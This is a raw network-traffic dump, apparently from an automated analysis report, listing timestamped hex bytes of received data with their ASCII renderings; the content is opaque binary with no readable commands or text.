                                                                                                                                                    2022-09-29 12:59:25 UTC35904INData Raw: 06 85 3a 64 96 19 9d af b8 10 85 4b 38 db 36 31 b3 7e 1b fa 36 1b bb af 36 44 d6 43 bb 99 bc c3 65 af 04 78 1f d4 7b d9 5c f1 d6 e9 5e 7a bf dd 2d bd 6d d6 f3 cb 14 1e ca 6a 81 b6 29 91 04 b0 32 b0 8e 64 91 e8 de 3b 6f 34 c4 42 37 4b a5 8f ab f3 0b ac c5 d9 5c be 89 3c b1 d9 56 c3 40 02 f5 bb 17 6a 3d 79 90 1e 19 c3 6f 5b 6e f9 2b 7e cf f6 99 41 40 85 f1 53 5f e0 f6 31 b4 69 6a 6b 3f d1 55 55 17 c0 d6 e9 6a bb 5e b3 b7 58 0b 92 59 0d 33 79 c6 77 b3 5e bc 50 2a e1 06 16 1c ca 29 23 59 1a 64 54 fb f3 29 59 86 ea 94 f0 b7 21 28 a7 51 dd 96 57 3a 1b cc 6b 02 c1 7b 5f 13 6f 46 11 2d 44 dd 6f fd 95 5e 3a 97 bd 7d cb 4b 20 1f 60 86 c0 aa c1 b8 a8 0e 1b bc 18 00 36 8b 55 d5 6f 34 49 83 95 20 a8 15 7c 6d 94 96 d7 46 74 8b 66 68 82 ff a8 e4 6f 9e b2 f0 83 6a e9 7a
                                                                                                                                                    Data Ascii: :dK861~66DCex{\^z-mj)2d;o4B7K\<V@j=yo[n+~A@S_1ijk?UUj^XY3yw^P*)#YdT)Y!(QW:k{_oF-Do^:}K `6Uo4I |mFtfhojz
                                                                                                                                                    2022-09-29 12:59:25 UTC35920INData Raw: 56 74 e0 53 88 8d e5 69 07 6b cd 05 da a4 73 03 10 2b 46 a4 64 bd 04 08 d1 d8 bc 30 a7 03 c3 d6 18 df b3 6c 17 e5 ae b7 c8 be 17 80 6a fb 20 27 1e 4f 6b 71 92 90 1f d1 a7 da 18 6b fd 07 1d 83 f5 d8 9d ee 68 1c f6 75 5e 37 d4 ce 34 4a 46 e0 49 14 3c cf 07 d0 36 63 ca 0c 7c 13 cc 2c 88 7b 1e 93 d3 da f9 d1 7b b3 15 2f 43 d4 9a ac 8b 9a 7c 1c 50 f1 a5 ce fe 8e 68 2a fe 77 37 29 f4 a9 5b 2a 00 bf df 23 77 8f 12 fa 5f 7d 79 c4 74 5e be 47 f0 d5 ba ad 4f 12 9e f8 59 51 05 cc 66 61 75 3c cd ef ce df 6b 3a fd b1 e2 2c 97 42 07 5b f8 0f 4c 5f f1 3e 4d 9a 0c d7 f8 55 7c bc 8e eb ea d6 ae de 27 d7 6f 06 24 5f 45 45 e2 e3 2d 8d c3 db a6 ca 97 d8 15 02 46 e4 5a e3 62 a1 a8 64 1b 49 87 8e e4 6f 4a 3e 9a 92 29 3a 53 1a 7b 78 6f eb 8f 84 3a c6 aa a6 ee cb 99 b2 b4 09 3d
                                                                                                                                                    Data Ascii: VtSiks+Fd0lj 'Okqkhu^74JFI<6c|,{{/C|Ph*w7)[*#w_}yt^GOYQfau<k:,B[L_>MU|'o$_EE-FZbdIoJ>):S{xo:=
                                                                                                                                                    2022-09-29 12:59:25 UTC35936INData Raw: 6b df 7b ee b0 88 7d 0b 03 8f bc 4a 7c 2b 81 79 00 82 ee 41 9d a2 85 06 59 96 b3 b6 35 e3 34 63 d6 ee 77 4a eb 0b 7e 68 07 79 f9 03 c5 4f 0f 01 74 bc 4e 6d 19 8f 86 34 cc 22 34 61 d1 5b 6d fa af 56 63 a5 b9 d6 9a db a1 a7 4f 7a f1 b9 1e 4d f6 79 35 5c d4 8b 82 64 2e 9b be 9a 81 73 e7 22 46 cd bb 9e 8f d5 ed 49 32 7c e0 8c 5f e2 c3 fb 18 83 54 95 4d de 47 3e b5 0b 9c e1 83 a8 4d 59 df 50 d6 ae aa 6c c8 04 42 e8 e4 9e 99 c4 7d e6 85 97 1e a9 be 76 a0 c3 bd 66 cf 1c 6f a0 23 af 3e 86 19 66 eb a3 e8 44 9f 68 f4 36 c8 71 3b c8 5a b1 c6 48 37 3d ce c3 f4 78 aa 0b 4a 86 6a 7e 14 50 4b cb 19 08 1d 12 a3 57 60 60 cb 73 4f 6d 73 2e 47 86 f9 9e 40 c7 95 f2 5f fe 7f 38 ba ef 1d b4 63 03 c7 c5 16 3c fb 22 66 18 3f 11 c0 c7 c2 34 89 5f bb 79 c6 84 e7 03 a7 22 c7 ef 90
                                                                                                                                                    Data Ascii: k{}J|+yAY54cwJ~hyOtNm4"4a[mVcOzMy5\d.s"FI2|_TMG>MYPlB}vfo#>fDh6q;ZH7=xJj~PKW``sOms.G@_8c<"f?4_y"
                                                                                                                                                    2022-09-29 12:59:25 UTC35952INData Raw: 6f 11 5e c8 9a e3 cb da c6 58 3b 31 7c d3 43 6c ed d2 47 46 f2 c5 36 82 83 c6 b8 f6 36 77 6a ed 49 fa ef 23 57 f0 3c 8d f4 7c 84 e8 68 e6 d1 87 93 6c 32 f3 11 3c dc 88 b4 fb 87 b7 8d c0 71 98 b9 e9 21 36 49 10 9a e2 34 82 b6 2e 2e 1f 17 ac 97 a2 6e 0e 38 79 7d 9d 26 0d a7 79 88 27 4e e5 2a 17 c9 22 3a b6 9d f2 29 e6 c3 3b aa 72 53 1d 43 02 6a d2 48 fd 5a b1 23 a5 cb 08 d3 1a 89 40 d3 87 02 7f ba 49 fd 4c 1b 17 5a 23 22 84 66 78 04 c2 9c 2b 11 0b 09 d4 92 f5 cb 4c be 4a 93 43 46 b9 a5 27 d7 f2 04 47 98 e5 e5 da ae 4c 59 db bb 4a 1b 60 e0 33 92 e8 e4 71 0c ae c1 80 b5 57 c8 56 ba ac 06 c6 26 f7 d1 35 f5 40 5e 6d 94 ee a3 e8 f8 c6 57 ad 36 bc 38 42 4b 19 9a a9 b7 22 ec 96 1d 09 24 9d fc de 39 e4 13 e8 93 56 1e 9b a4 d3 a3 78 5e a9 3d 75 59 7b d6 ca 82 62 dc
                                                                                                                                                    Data Ascii: o^X;1|ClGF66wjI#W<|hl2<q!6I4..n8y}&y'N*":);rSCjHZ#@ILZ#"fx+LJCF'GLYJ`3qWV&5@^mW68BK"$9Vx^=uY{b
                                                                                                                                                    2022-09-29 12:59:25 UTC35968INData Raw: 9a e6 6c 59 ec 2b bc 54 db 9b 2b ff 33 68 24 20 bd 8a e2 51 c2 d5 d4 3f a8 80 32 5a c6 99 b9 70 a5 2a 27 46 39 ed dc dd 35 88 7f d7 60 d2 c0 2d f5 3f 20 26 de b5 ae a0 fb 6b 53 d7 6b cd 43 eb 5e 90 2c cb ff b2 44 20 c1 50 4c fc 65 25 e2 96 f1 e5 7a 3e 35 70 e6 25 1e 25 92 08 f4 94 02 13 0d 1a 46 2f 9a 22 c5 0a 35 94 fe ed bd 32 c8 07 9d bf 9c e2 26 23 fb ae 7e b2 39 7e a5 4e bb 03 bf 59 60 34 10 ae aa 65 d9 a3 47 5e d8 a7 2d ee 3e 8e 03 c5 21 d8 89 79 af a3 7c ba b8 ca 02 83 65 a8 54 f9 72 95 bd b5 d0 61 4a 63 c3 97 a3 28 75 9d 8f 20 81 31 c7 c5 ac d5 c9 f1 83 70 02 d3 12 48 de 93 02 ea cb bb d5 26 40 ae e4 3b 9a 7a 3a 11 a5 b4 26 cb ea 9f e4 ae 0d b5 26 38 de f1 da 38 f6 b3 f9 3a fa 95 62 2b 9e 49 92 99 68 0d 00 6b a1 f2 f2 cd 30 5a b5 d6 d3 1e 20 90 b3
                                                                                                                                                    Data Ascii: lY+T+3h$ Q?2Zp*'F95`-? &kSkC^,D PLe%z>5p%%F/"52&#~9~NY`4eG^->!y|eTraJc(u 1pH&@;z:&&88:b+Ihk0Z
                                                                                                                                                    2022-09-29 12:59:25 UTC35984INData Raw: 7f cd 98 2b f0 cc 07 47 f2 30 af e1 a1 c0 f0 73 e7 9f 0f 86 26 8f c5 90 dd 38 b0 8c a3 00 c8 86 3a f2 30 31 8e e4 cc 39 9f fd 1f 54 18 a3 6e 78 26 d8 7f de 4c 6e 74 76 94 66 2e 32 26 4c 36 9a 4f af 11 06 e8 cd a2 95 40 5a 5f 24 6d 95 a9 96 20 9a e4 43 a9 eb 03 9d 48 53 4c fb 70 26 9a e0 6d bf b5 fd 14 46 8d b8 6e a3 81 42 58 6e e9 cc e6 19 f1 14 28 0b c9 fd d8 6e b4 63 93 af 3e 62 1b 05 55 7c fd c8 b2 2b 09 27 84 f9 dc ca f1 2c f9 9b 3c 53 ab db 1b 1c 86 ac 5f 39 19 15 fb b0 92 3c f6 0e 52 5d 1d 27 c3 0a 67 90 c2 f2 3e f0 0a 3a 38 dc ad 6e b4 77 fb db c5 42 24 9a 09 d6 0d 99 7f 2d cb dc 67 54 57 09 72 34 09 52 34 f4 25 6d a1 80 c9 ac 21 65 05 b2 d9 6a b1 8b 46 99 ec dc 61 72 eb c9 8d 67 ca 67 3e fd 6d 54 a3 31 8f 60 a6 9b 7b 04 d3 57 76 e6 4c 78 24 76 15
                                                                                                                                                    Data Ascii: +G0s&8:019Tnx&Lntvf.2&L6O@Z_$m CHSLp&mFnBXn(nc>bU|+',<S_9<R]'g>:8nwB$-gTWr4R4%m!ejFargg>mT1`{WvLx$v
                                                                                                                                                    2022-09-29 12:59:25 UTC36000INData Raw: 9f 90 4d a0 0a cd 0d 09 69 85 e2 f5 4f 2b f3 0b 54 03 99 96 41 7f 1f 6b ef 65 e5 59 f4 cb 73 8f 35 c1 4c fa 46 51 4d fe d0 ad d4 f5 37 96 7f 86 00 10 3d 1c 64 97 d4 9e a1 4b 87 4b fb a7 3c 59 fc 6f 03 f2 9c 5c a8 1e 61 61 cf 3e be 51 66 43 7d 90 68 78 ea 39 9a ee 0d 64 15 62 bf 5f 52 4b 32 6c 30 8e d0 41 cb ff bd db 4c 6b 73 b0 6e 34 77 dd eb 41 71 d9 25 c1 e4 c9 a1 c7 bf 43 b3 26 2f 80 d6 5b ee d2 f8 c6 53 d0 e5 7f e5 3c eb 9b 4b eb c6 18 cf 47 96 4e 60 f9 88 85 8d ba 45 dd c5 71 c8 52 b6 9b d5 0f e3 f5 18 d5 14 c9 6c d6 71 ba 77 27 4c d0 37 14 10 44 e1 95 36 db 83 16 67 c8 9b 66 15 0e c4 fa 16 bf fc c6 72 79 7a 17 77 77 20 f5 d8 b7 d6 40 85 ff b5 3f 40 11 fe ca 7c c0 08 e7 9c 1c 41 42 2f 4a a2 28 70 f1 2f 2d c2 2a e8 1f 3c b7 24 af 91 27 f3 4c 00 be 05
                                                                                                                                                    Data Ascii: MiO+TAkeYs5LFQM7=dKK<Yo\aa>QfC}hx9db_RK2l0ALksn4wAq%C&/[S<KGN`EqRlqw'L7D6gfryzww @?@|AB/J(p/-*<$'L
                                                                                                                                                    2022-09-29 12:59:25 UTC36016INData Raw: 17 f3 51 f9 59 1c 28 31 ef f2 8a 5e 50 09 92 e4 ad 77 09 02 e7 8e 26 bb ec 53 4a 02 cb 68 0c db fb 21 33 ec 27 42 37 dd 9a cb 2e 1a b2 4b 0d 7c 04 aa db 9f 57 77 cc 01 12 e4 80 9b 42 0a 93 ce 0c 8c d7 38 a6 dd 53 b8 21 42 f6 2b 02 b7 c7 67 cf a4 90 33 75 b5 98 f9 20 10 cc d9 28 8b 4f 0b 3f 4d a2 28 53 b3 c3 fd b2 84 69 d4 56 99 d1 d5 b9 77 75 2a cf a7 1e 18 79 ff 41 db 1a 6e 19 84 c7 7c ef 43 f8 1d 26 82 eb 9f 63 37 06 e0 68 0e 05 d4 9e 6c a6 69 5e c0 17 62 c0 bc a3 e2 53 19 ae a6 b4 18 db 4f 36 f0 96 f2 df c0 21 64 72 67 5a 0b 83 8c 59 88 02 09 5f b5 61 bd 7a a0 72 af 5b b8 16 f7 ac 35 00 8a 49 bf b1 d2 d4 91 c2 05 e1 92 2e 8a 36 3f e2 24 df 2b 5e f5 7d 35 b6 ef 80 a6 a0 4c 84 bf 2a 0c 50 49 93 a2 09 62 4b 15 e7 34 bd 54 d4 1d 83 e6 7b 66 59 2f c2 ff 86
                                                                                                                                                    Data Ascii: QY(1^Pw&SJh!3'B7.K|WwB8S!B+g3u (O?M(SiVwu*yAn|C&c7hli^bSO6!drgZY_azr[5I.6?$+^}5L*PIbK4T{fY/
                                                                                                                                                    2022-09-29 12:59:25 UTC36032INData Raw: 65 34 35 08 56 84 d0 f2 fa 53 ef 7e 3d ad 6f 3a 13 31 97 53 b6 9a 25 db 6b ee 8d 4e a0 2c 0e b4 9d 3c 7c 02 d7 74 c8 e0 df 15 18 c3 26 94 e3 75 78 6b 4b 39 99 1b 2e 37 75 f8 3b bd d0 77 a4 7b 47 6c de 94 96 4b ef 27 f6 bc 6d 0c dc 97 34 b8 8b a4 7a 8a 1f dc 2e 16 ad b1 15 ba 99 c3 95 b4 25 fe c6 f9 1b d0 d1 31 15 c0 93 47 4f d9 50 42 13 92 bd b2 99 15 4e b7 13 72 e5 e2 51 4d 70 5c 0c 47 9f 5d 25 ac 25 db 7c 3d b5 f3 42 ed 29 60 4c ea 30 7e d5 e3 d1 7f 31 85 b7 2d 5b a6 14 8d 9a ed 1a 0c 32 60 9b f0 97 ee 15 0a 7b 6e b2 7d 74 b9 9a 4d d0 12 6e 3b dd 35 78 8c 3b 54 f6 15 09 d6 46 d8 5d 65 ec e8 c9 83 10 12 cb ff e2 6b e7 c7 c1 bc 4c f1 c4 24 ac 5a c2 4c b6 9a 74 bc 15 5a f4 6b 49 a7 06 af 48 c6 c5 25 69 f0 38 a5 8e 80 94 4a da 8c de 5e b7 e5 45 ff 93 6f cd
                                                                                                                                                    Data Ascii: e45VS~=o:1S%kN,<|t&uxkK9.7u;w{GlK'm4z.%1GOPBNrQMp\G]%%|=B)`L0~1-[2`{n}tMn;5x;TF]ekL$ZLtZkIH%i8J^Eo
                                                                                                                                                    2022-09-29 12:59:25 UTC36048INData Raw: 5a 8e 4e f7 1a 4a 4a 5b ef 6e 37 46 0b 38 c9 d0 75 8c 78 c2 7a a6 f2 85 b6 a6 cd 2f 61 34 0e 49 6d 1d 93 bb 2b 85 20 90 c6 39 47 17 75 f3 05 ad fb 7e 1d 31 3b af 0b 71 a6 9d 09 73 87 be a8 fc 6e d9 41 de fd 29 74 65 c4 d1 24 be bb 6e e0 1b 5a 45 b2 da be b5 96 52 db 9a b0 b9 76 96 8f 9e 19 28 5c a9 d7 55 da 82 6d 53 36 8d 8c 63 85 32 9f 83 4a 81 6a a4 ae 2b aa 00 0e fe 4a 9f 09 13 d0 e3 47 fc 5d db 3d 20 57 a3 c1 30 34 e9 2d c2 aa 1f b1 a2 2b 89 0a 66 4f c2 89 7f 30 39 3c 92 6a 7d e6 18 94 ff 8d c1 bd ff 71 83 c7 81 76 c8 80 65 64 40 2f 01 64 18 b6 8c e6 39 2e d9 ec b3 59 f8 71 fe 51 7e 7a 38 48 d8 af eb cc 97 af 8d 18 67 3f 57 93 32 d0 7f e0 6d 3c 34 c2 aa a9 40 a6 81 dc 0f cd db 40 da df 5f 22 30 72 26 0b cb 20 a5 29 f7 4e c2 1a 78 c0 25 7f 6d 12 d5 1e
                                                                                                                                                    Data Ascii: ZNJJ[n7F8uxz/a4Im+ 9Gu~1;qsnA)te$nZERv(\UmS6c2Jj+JG]= W04-+fO09<j}qved@/d9.YqQ~z8Hg?W2m<4@@_"0r& )Nx%m
                                                                                                                                                    2022-09-29 12:59:25 UTC36064INData Raw: 59 82 2f db 06 7a cf d8 6a c5 7f 9a 1e 64 5a 7d 2f 07 30 2f 94 18 5a cb f4 0f 69 1f a8 89 1a fd 91 d0 9c 2a 2a 87 0d 31 5e 73 96 d2 e3 01 68 85 48 f8 36 e1 78 71 bf e6 17 d8 c0 9d de 23 53 84 17 d1 14 2b cf 0f ea 28 26 1a e8 bf 90 47 61 6d 7b 17 34 18 2d bb 0d 30 60 73 29 80 06 a7 f6 4d 9c 3c 31 fe ae a3 8d 35 6d b4 09 39 6b 05 2b 3d 44 cb c2 78 a4 65 fc e6 74 42 e8 fe 30 3b 36 9c 6e 46 58 ce 1f 60 49 1d 6d 11 21 cf 8b 8f 27 30 a8 e5 67 4a 6e af c1 53 28 bd 32 59 e0 c2 f1 76 7a 6e 0d 68 4e f6 e6 a2 28 98 03 c9 8d e7 dd f9 52 e5 6b d7 48 72 a8 5a d7 6f e6 d9 6f 94 b3 b8 e0 73 96 0a 3f c3 31 0d 5c d1 38 ec 8e 01 1f 72 70 53 e1 64 dd 1d c8 28 ce 5c 15 8b 8b de 9f 1b 8d 26 94 f8 7e be 0a 08 55 bf 7a 2e ad 5f cb 32 2b 01 24 05 0c 9f 34 98 03 4d ba 38 87 2c 08
                                                                                                                                                    Data Ascii: Y/zjdZ}/0/Zi**1^shH6xq#S+(&Gam{4-0`s)M<15m9k+=DxetB0;6nFX`Im!'0gJnS(2YvznhN(RkHrZoos?1\8rpSd(\&~Uz._2+$4M8,
                                                                                                                                                    2022-09-29 12:59:25 UTC36080INData Raw: 3a de 2a 53 fa e9 12 6f be 69 09 f4 04 3c e9 af 45 08 0b f2 99 ae b3 be 93 07 1d ce d1 82 74 7b 96 b8 4b 7c aa 15 27 54 54 96 db 74 0e 80 f2 73 16 b2 01 94 f9 0a 31 bc b8 2c f4 a7 9c 0c 68 15 0d 73 38 70 b2 69 b4 eb 15 a0 fd 64 80 eb c7 fd bc d8 74 81 56 7b ee f1 a5 19 78 db a6 3f b9 b9 3f 3f 89 7f 39 c4 9b 92 e9 13 41 92 89 34 32 76 61 c0 c0 b2 4e f2 69 1a a0 c8 90 7d 31 f2 f6 0f ec 26 33 1a 78 e0 49 d5 ff bc d2 4e 7b 52 12 e9 9d bd bc ff 8e ec 8c 4f 71 4a 68 e5 e9 cb a9 e5 6b bb 7f 38 26 15 fb 88 5f b0 b8 e0 bb 99 fd f3 b0 f0 1f 1e 7c bd bc ac 6e b0 22 74 d3 c1 fb 6b 8c a0 94 ec 21 b9 57 40 e9 80 01 5f 27 e9 8d fe 48 3b 89 25 58 73 da 5a d3 9e c7 ab e9 8f 3d 0b dd 0f 69 35 61 d5 5d 22 d8 3e ea e1 ef 86 17 e9 79 28 9f 9d 81 b4 86 c9 8c 3b 97 fb 75 71 95
                                                                                                                                                    Data Ascii: :*Soi<Et{K|'TTts1,hs8pidtV{x???9A42vaNi}1&3xIN{ROqJhk8&_|n"tk!W@_'H;%XsZ=i5a]">y(;uq
                                                                                                                                                    2022-09-29 12:59:25 UTC36096INData Raw: 0d 9a 0b 5e 71 02 c7 4b a8 4e c8 5c d8 5f 62 17 c8 88 a8 92 77 1a 5e 90 ce d9 90 61 2e 9a d9 1b 4e 18 1a c6 14 79 27 f6 ba 2d 2a 14 cc 0e 56 b8 13 23 45 f6 07 56 e6 39 12 3e 4f 96 0f 86 47 e4 15 83 f9 1b bc 3e 2e 7c ba e1 e2 04 31 52 1d f7 59 dc 29 84 a4 2e 0e 7c 2a 7d d8 61 b3 53 a5 18 f9 6c 0c 5b 7a d5 7d 1c ff 70 67 18 33 0c 9a 8e 76 ad eb c3 f2 a1 b5 b3 97 8a a4 6e ae ac 5d 12 da e5 9d ac 8a 43 db 96 a4 09 dc 29 bc 6a e0 10 54 df 7d da 9f 5c 53 a7 9a 49 dc 83 28 6c c3 d8 4e f7 50 bd 20 f8 9a 87 07 b4 8b f7 d5 9a f9 bb 29 de e2 4b 2d b9 0f a6 f6 81 23 56 07 bb f0 28 82 52 37 9a ad 25 72 5a 03 7a d6 5d 7c be 77 2f d6 cf 6a 8e b1 6c 7c 72 6e 2f f4 6d 10 21 ff 4b b9 e1 bb 54 b4 83 52 2a d7 44 54 09 ef ef 19 e8 ef e1 c3 3a 75 4f 0d c7 34 7b fa 21 62 31 3c
                                                                                                                                                    Data Ascii: ^qKN\_bw^a.Ny'-*V#EV9>OG>.|1RY).|*}aSl[z}pg3vn]C)jT}\SI(lNP )K-#V(R7%rZz]|w/jl|rn/m!KTR*DT:uO4{!b1<
                                                                                                                                                    2022-09-29 12:59:25 UTC36112INData Raw: 93 f9 f2 d5 e8 27 b8 36 8d 52 5b 9b 3e 7e 02 a4 5d 40 f7 2a 30 82 75 07 69 dd d0 5b 1c ee 33 5b ee d6 e3 78 59 fe aa 0c 6e 3a 11 db 0d f0 b3 3a 22 84 d0 97 0b 7b 6a bc 01 68 54 d3 45 d9 f5 8d 09 02 eb b9 d5 05 15 3b 05 ba 14 7b 75 a7 36 b2 42 32 05 96 8b ae f6 cf 79 e9 1f 17 85 51 93 c6 60 2c 07 60 5c ad 18 bc 6c 44 0a cb 4b a6 4f f7 ed 8f 56 1a 33 be 39 aa fa b7 58 70 81 94 b2 fe 98 8b 25 36 b7 9c 6d ea 0c cf 3b 71 d8 90 03 72 23 17 74 c2 43 1c 62 bc af 28 87 51 f9 4e 9e 14 a7 ea d5 2c e8 71 94 0d 67 41 d5 1d 11 0f 3e 9d 34 ad f9 f5 bc 46 3d f8 6a 3d 09 4b 58 97 55 c1 06 7d 8f 34 ba eb 9e c8 a9 8f 73 80 33 ac dd c7 d6 92 36 53 93 de 4d c3 e0 e2 82 d2 8e 5a 3f 0f fc 80 a4 72 46 f0 39 bd a1 c0 f2 27 67 28 7d 0c d0 4f b1 7c 90 e3 d7 d6 0e 00 1b 10 b2 62 fd
                                                                                                                                                    Data Ascii: '6R[>~]@*0ui[3[xYn::"{jhTE;{u6B2yQ`,`\lDKOV39Xp%6m;qr#tCb(QN,qgA>4F=j=KXU}4s36SMZ?rF9'g(}O|b
                                                                                                                                                    2022-09-29 12:59:25 UTC36128INData Raw: 72 5a 2f 7b af 7b 30 2f a0 25 70 9b 5d 24 a7 1f 74 9d 35 4e 89 14 a6 fc e6 c4 b9 4d 2c 67 47 52 4d f7 79 e6 3f 0f 9d 58 a8 06 45 86 fc cc a4 3a 9d b8 26 0d 13 3e db a1 ef 95 ae da 3f c5 14 75 7e c6 1e 52 d8 b5 2c 10 78 1f b7 a2 1b d2 c1 7f da 93 93 a8 f2 e5 59 b2 d5 cc 29 51 b8 21 46 3f 9c 6e be 9b 5c df cf 21 8c e6 7e 2c 63 9e 2d c2 28 22 1b 45 2e 31 ff 3e 7c 74 d0 0b 07 d3 70 ce a0 1f 18 be 1d 48 35 ab 02 23 07 79 58 da 26 b8 9b 34 15 13 b0 92 a4 fe c2 51 69 97 3e 6a d8 1e 99 d9 ca 2f 1c ae 54 e7 31 27 b3 de d7 1a 44 87 ea 57 58 22 4c 2f 00 b3 df fc 85 32 f0 a1 b7 dd 35 5f b9 eb 6f 62 30 c5 63 cb e8 bd 05 f4 b4 78 7b 46 f0 62 64 20 a1 ac 59 b6 78 59 4b d4 0e cc 91 5c 40 43 c1 05 03 2e b8 34 6f 3a 29 1b f2 3a 25 06 63 77 53 56 2a 50 9b 66 6a 2d 19 c7 07
                                                                                                                                                    Data Ascii: rZ/{{0/%p]$t5NM,gGRMy?XE:&>?u~R,xY)Q!F?n\!~,c-("E.1>|tpH5#yX&4Qi>j/T1'DWX"L/25_ob0cx{Fbd YxYK\@C.4o:):%cwSV*Pfj-
                                                                                                                                                    2022-09-29 12:59:25 UTC36144INData Raw: 54 3b 6e 30 1a a2 5b ad 7e 76 8d b3 37 27 71 3b c2 a3 80 ee 6f d6 bc 14 17 94 18 88 2d 4c d2 c2 17 a2 3f 10 9f 22 b5 f2 54 14 d4 c7 c2 0f 32 ac e2 c1 a6 0b 6b af b0 38 17 98 b7 eb ba 28 c9 8d f6 76 3e be a9 51 24 93 78 4b 3e e2 ff 36 b1 59 13 5d ec 41 2d 03 09 af 16 6b 03 c0 5a 5f d4 dc ea 91 4b 42 6b 8c 97 f2 e3 be e0 0a e9 3d 5c 1a e6 5b 65 61 18 d3 a3 e8 06 0c 23 4e cb bc 5c 66 d0 b3 62 5a cf 74 64 d8 a2 26 8f 41 b9 ab 32 75 8f 82 5e e3 a4 a7 4e 58 eb ea 73 1a e6 11 bf ab 34 49 9b b9 89 5e c7 15 87 4c 1b b8 b1 12 ce c2 d8 81 47 bd a7 f1 80 a8 e3 36 7b 51 94 23 e1 97 db 24 a4 9e f6 00 e7 fa c4 3f 5d a6 77 d8 0a 36 2d 0c aa 5e 6a 6c 63 ab aa b2 1c 00 dd 37 d0 41 6a 20 55 8f d2 68 1c d3 cc 97 22 b1 81 da 42 d2 14 4d 82 a2 3c 65 c5 b7 0b 8e 76 55 50 f6 dd
                                                                                                                                                    Data Ascii: T;n0[~v7'q;o-L?"T2k8(v>Q$xK>6Y]A-kZ_KBk=\[ea#N\fbZtd&A2u^NXs4I^LG6{Q#$?]w6-^jlc7Aj Uh"BM<evUP
                                                                                                                                                    2022-09-29 12:59:25 UTC36160INData Raw: 59 e6 0d b2 10 6e 40 b0 26 cd 22 f5 81 08 f7 d1 57 94 63 b6 e1 b0 2d 43 59 32 f8 66 4e eb d6 46 b9 5f 02 32 c8 f1 f8 ef fd af f2 ea 4d 2d bb ba 4e 25 ab 7f c1 68 3d af 2e f3 68 d2 84 7c 09 c1 8c e9 5f 84 58 7d 28 41 e6 79 4f 3e 12 45 7d 93 39 00 9b 72 63 e1 70 cb da b2 20 ec b0 d4 bd f6 d4 08 fc 52 37 3f 68 80 84 0f e9 1b 1e 79 f9 55 51 f7 dc 33 b9 06 05 a3 0c 30 92 c3 d3 c5 80 95 8f fa 86 b8 48 a6 51 c1 18 04 28 35 4c 2f ab 47 b9 d9 1d d4 7b 5b 7e 8d 55 31 ee 2d d6 b5 4c f3 e1 a8 75 e8 b9 9b 1f 54 e8 4e d8 e1 4c 20 68 f0 62 29 27 e3 47 6b dd cf eb 56 83 6c b0 ef 12 38 b8 e0 76 93 5c 16 34 16 02 ff 8d 54 5a e1 db d8 c6 e5 53 6b e6 2f ef 6b 5a ba 2f 78 40 5d 2c 1c 1a 34 f9 80 18 ac ae 9c 62 56 99 c1 aa 01 6d be b3 2e 77 3b 0a 90 1b 07 41 89 c4 d9 fd ae 13
                                                                                                                                                    Data Ascii: Yn@&"Wc-CY2fNF_2M-N%h=.h|_X}(AyO>E}9rcp R7?hyUQ30HQ(5L/G{[~U1-LuTNL hb)'GkVl8v\4TZSk/kZ/x@],4bVm.w;A
                                                                                                                                                    2022-09-29 12:59:25 UTC36176INData Raw: 7f 41 8d c3 cc 2a a7 ed 69 ec e1 85 95 01 41 51 04 ac 25 a9 f5 bc fd 5a 2d 0c a7 88 cf 53 d5 fb 27 8b e0 03 0c fc 41 60 ae 41 6b 28 a0 9e 4c 7a ff 99 b8 01 5b 9d db 8c 30 3b a1 9a 44 08 89 2e 0e 53 be 99 23 45 ea d8 ce 8d 31 f7 d0 46 a4 3f c5 03 46 dd 4d 7e 30 48 df 7d 1b 67 35 14 71 2f d8 52 88 a7 2c c8 f4 30 63 2e ce 89 bd 7b ee 8b ce 6b 29 65 51 44 1e 6f 7f af ed 82 99 3c 7e 7a f8 44 33 c3 df a0 a7 f6 a2 70 76 b3 2b 50 0e 4d c5 14 6f 82 7c 2f 3c 28 5d b6 ab 27 6b 3f 55 29 47 2b 23 f0 c4 0a 2c 85 82 4d 9f 16 38 a5 7a c1 2f 01 f9 69 4b 16 ce 1d 58 82 ab d2 a3 44 60 2a 85 e9 62 d1 24 e4 4c 16 d6 ba 7f af e3 47 6a e8 a6 48 fd 91 c1 16 c4 55 9e bc 8a b1 17 b2 ff fc ef 3b 3c e6 f0 c8 03 9f 9f 19 0b 6c c1 f6 ee 3f 13 b7 74 cd c5 b2 72 84 f7 f7 09 d7 84 6f b7
                                                                                                                                                    Data Ascii: A*iAQ%Z-S'A`Ak(Lz[0;D.S#E1F?FM~0H}g5q/R,0c.{k)eQDo<~zD3pv+PMo|/<(]'k?U)G+#,M8z/iKXD`*b$LGjHU;<l?tro
                                                                                                                                                    2022-09-29 12:59:25 UTC36192INData Raw: 43 07 46 6f 67 cd 74 c9 41 4c 41 f3 1e 83 79 97 67 e0 77 87 b6 2b 72 c7 31 a5 64 a6 73 3c de 0a a4 83 6a 86 e2 9c c7 ae 0d 49 9d 11 a0 af dc b2 b0 f9 a3 ee ce c3 b1 50 3d b8 59 6e fa 71 68 4f c7 ca a3 dd da 62 79 b8 64 21 60 7d 37 80 82 ec 17 97 c9 3a ec d0 6e 9f 1e 7c 73 4b 64 f5 9f 16 4a cc 2e 5a cb 74 bb 4f a5 76 36 37 27 af c0 80 8f d6 41 e6 00 13 44 cc 45 9d a8 96 8c 8e 0f 0c 22 6c 8e 2f d7 d0 c8 85 cd 7d 2d 49 fb b1 89 f4 db 00 a6 52 2c 1a e7 8c 13 77 8e 8f bc 1b b4 6c 82 8e 44 4b 7d d2 56 7d 82 2e 90 7a 2c 2e 41 f8 36 ce 8d 01 f3 01 c3 52 c1 90 e2 6a 35 43 c4 f5 a5 1b 8f be 22 13 44 59 68 ff 4b 1d e6 6d 42 d7 3f bd 14 9a f4 6c c9 e1 22 95 b8 ba 39 90 eb f4 15 24 b6 1d 98 7e d0 66 fa 24 3f 44 db 36 2f b9 cf 9c 82 e3 38 ec 86 7e b7 fe d5 29 07 a8 67
                                                                                                                                                    Data Ascii: CFogtALAygw+r1ds<jIP=YnqhObyd!`}7:n|sKdJ.ZtOv67'ADE"l/}-IR,wlDK}V}.z,.A6Rj5C"DYhKmB?l"9$~f$?D6/8~)g
